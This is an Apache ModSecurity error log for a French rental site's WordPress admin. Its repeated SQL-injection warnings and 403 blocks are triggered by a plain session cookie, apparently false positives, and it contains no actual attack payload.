[Mon May 11 22:21:18.022910 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI6PqFW67LJTsgN3jQKpgAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:21:18.023207 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI6PqFW67LJTsgN3jQKpgAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:21:18.415379 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6PqFW67LJTsgN3jQKpgAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:21:21.434596 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI6QaFW67LJTsgN3jQKqgAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:21:21.434869 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI6QaFW67LJTsgN3jQKqgAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:21:21.600349 2026] [authz_core:error] [pid 1601130:tid 1601173] [client 47.128.125.78:36318] AH01630: client denied by server configuration: /home/maelbail/public_html/wp-includes/IXR/error_log
[Mon May 11 22:21:22.022374 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6QaFW67LJTsgN3jQKqgAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:21:25.143743 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI6RaFW67LJTsgN3jQKsAAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:21:25.144038 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI6RaFW67LJTsgN3jQKsAAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:21:25.727426 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6RaFW67LJTsgN3jQKsAAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:21:26.630938 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI6RqFW67LJTsgN3jQKtgAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:21:26.631315 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI6RqFW67LJTsgN3jQKtgAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:21:27.303168 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6RqFW67LJTsgN3jQKtgAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:21:28.049726 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI6SKFW67LJTsgN3jQKvAAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:21:28.049993 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI6SKFW67LJTsgN3jQKvAAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:21:28.583271 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6SKFW67LJTsgN3jQKvAAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:21:28.831554 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI6SKFW67LJTsgN3jQKvQAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:21:28.831840 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI6SKFW67LJTsgN3jQKvQAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:21:29.391717 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6SKFW67LJTsgN3jQKvQAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:21:30.346521 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI6SqFW67LJTsgN3jQKvwAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:21:30.346806 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI6SqFW67LJTsgN3jQKvwAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:21:30.740252 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6SqFW67LJTsgN3jQKvwAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:21:31.343950 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI6S6FW67LJTsgN3jQKwQAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:21:31.344251 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI6S6FW67LJTsgN3jQKwQAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:21:31.750266 2026] [security2:error] [pid 1588898:tid 1588917] [client 43.128.69.143:50984] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.rentparadise.fr"] [uri "/"] [unique_id "agI6S6FW67LJTsgN3jQKwgAAABI"]
[Mon May 11 22:21:31.985749 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6S6FW67LJTsgN3jQKwQAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:21:32.642197 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI6TKFW67LJTsgN3jQKwwAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:21:32.642495 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI6TKFW67LJTsgN3jQKwwAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:21:33.231260 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6TKFW67LJTsgN3jQKwwAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:21:34.424308 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI6TqFW67LJTsgN3jQKxQAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:21:34.424613 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI6TqFW67LJTsgN3jQKxQAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:21:35.046241 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6TqFW67LJTsgN3jQKxQAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:21:35.914493 2026] [security2:error] [pid 1590352:tid 1590410] [client 43.128.69.143:52442] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.rentparadise.fr"] [uri "/"] [unique_id "agI6T61q0G_aXAqWauT5ngAAAJI"], referer: http://www.rentparadise.fr
[Mon May 11 22:21:36.149055 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI6UKFW67LJTsgN3jQKxwAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:21:36.149348 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI6UKFW67LJTsgN3jQKxwAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:21:36.718362 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6UKFW67LJTsgN3jQKxwAAAAg"], referer: https://rentparadise.fr/wp-login.php
